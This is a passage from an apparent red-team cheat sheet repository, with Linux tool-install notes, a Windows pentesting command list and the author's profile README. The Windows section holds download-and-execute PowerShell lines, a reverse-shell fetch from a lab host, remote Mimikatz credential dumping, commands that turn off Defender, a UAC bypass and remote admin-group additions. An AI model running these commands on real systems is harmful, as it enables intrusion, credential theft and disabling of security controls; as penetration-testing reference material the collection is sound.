isn't recommended 142 | 143 | ### How to open volume 144 | 145 | `veracrypt /media/` 146 | >By default it will mount into /media/veracrypt 147 | 148 | ### How to lock volume 149 | 150 | `veracrypt -d ` 151 | >By default -d without vc file will lock every container 152 | 153 | 154 | 155 | 156 | ## One-line install 157 | 158 | ### Install Golang 159 | 160 | ```bash 161 | sudo apt update && sudo apt install -y golang subfinder && export GOROOT=/usr/lib/go && export GOPATH=$HOME/go && export PATH=$GOPATH/bin:$GOROOT/bin:$PATH; 162 | ``` 163 | 164 | ### Install Docker 165 | 166 | ```sh 167 | # Install docker from kali repo 168 | sudo apt update && sudo apt install -y docker.io && sudo usermod -aG docker $USER && exec sg docker newgrp `id -gn` 169 | 170 | # Install docker from docker repo 171 | curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add - 172 | echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' | sudo tee /etc/apt/sources.list.d/docker.list 173 | sudo apt update && sudo apt remove docker docker-engine docker.io && sudo apt install docker-ce -y 174 | ``` 175 | 176 | ### Install SublimeText  177 | 178 | ```sh 179 | wget -qO - https://download.sublimetext.com/sublimehq-pub.gpg | sudo apt-key add - && sudo apt-get install apt-transport-https && echo "deb https://download.sublimetext.com/ apt/stable/" | sudo tee /etc/apt/sources.list.d/sublime-text.list && sudo apt-get update && sudo apt-get install sublime-text 180 | ``` 181 | 182 | 183 | ### Install Arsenal 184 | 185 | Inventory of useful commands 186 | 187 | ```bash 188 | # Install Arsenal 189 | git clone https://github.com/Orange-Cyberdefense/arsenal.git && cd arsenal && ./addalias.sh && ./run 190 | 191 | # Install Arsenal (with package) 192 | git clone https://github.com/Orange-Cyberdefense/arsenal.git && cd arsenal && sudo python3 setup.py install; cd arsenal; python3 app.py 193 | ``` 194 | 195 | -------------------------------------------------------------------------------- /Cheatsheets/useful-commands/windows.md: -------------------------------------------------------------------------------- 1 | # Windows 2 | 3 | ## Install Windows Terminal 4 | 5 | - [Windows Terminal](https://github.com/microsoft/terminal/releases) 6 | 7 | ## Install Kali WSL 8 | 9 | 1. [Enable Virtual Platform & WSL features Windows](https://www.configserverfirewall.com/windows-10/please-enable-the-virtual-machine-platform-windows-feature-and-ensure-virtualization-is-enabled-in-the-bios/) 10 | 2. Install latest Kali Linux from Microsoft Store (Microsoft account not required) 11 | 12 | ## Download file 13 | 14 | ```powershell 15 | certutil.exe -urlcache -f 16 | 17 | iwr -uri -Outfile 18 | ``` 19 | 20 | ## Download & Exec 21 | 22 | ```powershell 23 | iex (New-Object Net.Webclient).DownloadString("") 24 | 25 | # Reverse powershell x64 26 | c:\windows\sysnative\windowspowershell\v1.0\powershell.exe IEX(new-object net.webclient).downloadstring('http://10.10.14.12/Invoke-PowerShellTcp.ps1') 27 | 28 | 29 | $ss = New-PSSession -ComputerName 30 | Enter-PSSession -Session $ss 31 | Invoke-Command -Session $ss -ScriptBlock { iwr -uri http://192.168.56.2/Invoke-Mimikatz.ps1 -OutFile .\Invoke-Mimikatz.ps1 ; . .\Invoke-Mimikatz.ps1 ; Invoke-Mimikatz } 32 | ``` 33 | 34 | --- 35 | 36 | ## Runas 37 | 38 | ```bash 39 | runas /netonly /user: "C:\Program Files\file.exe" 40 | ``` 41 | 42 | ## Execution Policy 43 | 44 | ```powershell 45 | powershell -ep bypass 46 | ``` 47 | 48 | ## Contrained Language Mode 49 | 50 | ```powershell 51 | $ExecutionContext.SessionState.LanguageMode 52 | 53 | Invoke-Command -Session $ss -ScriptBlock {$ExecitonContext,SessionState,LanguageMode} 54 | 55 | ``` 56 | 57 | ## Applocker check 58 | 59 | ```powershell 60 | Get-AppLockerPolicy -Effective | select -ExpandProperty rulecollections 61 | ``` 62 | 63 | ## AV disable 64 | 65 | ```powershell 66 | Set-MpPreference -DisableRealTimeMonitoring $true 67 | Set-MpPreference -DisableIOAVProtection $true 68 | ``` 69 | 70 | ## UAC bypass 71 | 72 | ```powershell 73 | Invoke-EventVwrBypass -Command "powershell.exe whoami /all" 74 | ``` 75 | 76 | ## Impersonate 77 | 78 | ```powershell 79 | # PlainText 80 | $Password = ConvertTo-SecureString "" -AsPlainText -Force; $Credential = New-Object System.Management.Automation.PSCredential("", $Password); 81 | Invoke-Command -ComputerName -ScriptBlock { hostname; whoami } -Credential $Credential 82 | 83 | # SecureString 84 | $securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000028bf2' 85 | $passwd = $securepasswd | ConvertTo-SecureString 86 | $passwd System.Security.SecureString 87 | $creds = New-Object System.Management.Automation.PSCredential ("\administrator", $passwd) 88 | Invoke-Command -ScriptBlock {net localgroup Administrators \ /add} -ComputerName -Credential $creds 89 | ``` 90 | 91 | ## Pivot 92 | 93 | ```powershell 94 | $secure = New-PSSession -ComputerName 95 | Enter-PSSession -Session $secure 96 | ``` 97 | 98 | --- 99 | 100 | ## Import PS1 module 101 | 102 | ```powershell 103 | import-module 104 | . ./ 105 | ``` 106 | > Full path is sometimes mandatory for Import-Module ! 107 | 108 | 109 | ## PS remoting 110 | 111 | ```powershell 112 | New-PSSession -ComputerName 113 | Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess 114 | Import-Module .\Invoke-Mimikatz.ps1 115 | Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Session $true 116 | 117 | $sess = New-PSSession -ComputerName 118 | Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess 119 | Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess 120 | ``` 121 | 122 | 123 | 124 | ## Force Change password 125 | 126 | ```powershell 127 | Import-Module .\PowerView.ps1 128 | $SecPassword = ConvertTo-SecureString '' -AsPlainText -Force 129 | $Cred = New-Object System.Management.Automation.PSCredential('', $SecPassword) 130 | $UserPassword = ConvertTo-SecureString '' -AsPlainText -Force 131 | Set-DomainUserPassword -Identity prodadmin -AccountPassword $UserPassword -Crendential $Cred 132 | 133 | Set-ADAccountPassword -Identity -NewPassword (ConvertTo-SecureString -AsPlainText '' -Force) 134 | ``` 135 | 136 | 137 | 138 | ## Ping Scans 139 | 140 | ```powershell 141 | 1..255| foreach {Test-Connection -ComputerName "192.168.1.$_"} 142 | ``` 143 | 144 | --- 145 | 146 | ## Port Scan 147 | 148 | ```powershell 149 | 1..1024 | % { echo ((new-object Net.Sockets.TcpClient).Connect("",$_)) "$_ is open" } 2>out-null 150 | ``` 151 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Profile 2 | 3 | --- 4 | 5 | 6 | 7 | 8 | > ** Red Team Operator | Pentester | Ethical Hacker ** 9 | 10 | --- 11 | 12 | ## Certifications 13 | > `OSCP` - [Offensive Security Certified Professional](https://www.offensive-security.com/pwk-oscp/). 14 | 15 | > `OSCE` - [Offensive Security Certifed Expert](https://www.offensive-security.com/pen300-osep/). 16 | 17 | > `OSWE` - [Offensive Security Web Expert](https://www.offensive-security.com/awae-oswe/). 18 | 19 | --- 20 | 21 | ## Hacking Platforms 22 | - [HackTheBox](https://www.hackthebox.eu/profile/38480) 23 | - [Root-me](https://www.root-me.org/michmich-51168) 24 | 25 | --- 26 | 27 | ## Website 28 | - [michmich.eu](https://michmich.eu) 29 | 30 | ### How to contribute 31 | 32 | Just fork [this repository](https://github.com/michmich1000/Cheatsheets), then create a branch, work and push your content + create PR : 33 | 34 | ```bash 35 | git clone 36 | git checkout -b 37 | git add -p 38 | git commit -m "YourCommitName" 39 | git push origin 40 | ``` 41 | 42 | ### Contributors 43 | 44 | - [Jenaye](https://github.com/jenaye) 45 | - [Juan-Pablito](https://github.com/juan-pablito) 46 | -------------------------------------------------------------------------------- /assets/images/logo_dark.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/michmich1000/Cheatsheets/6b4baa1255896e97624ad6f6d3a6a680cceb6dc1/assets/images/logo_dark.png --------------------------------------------------------------------------------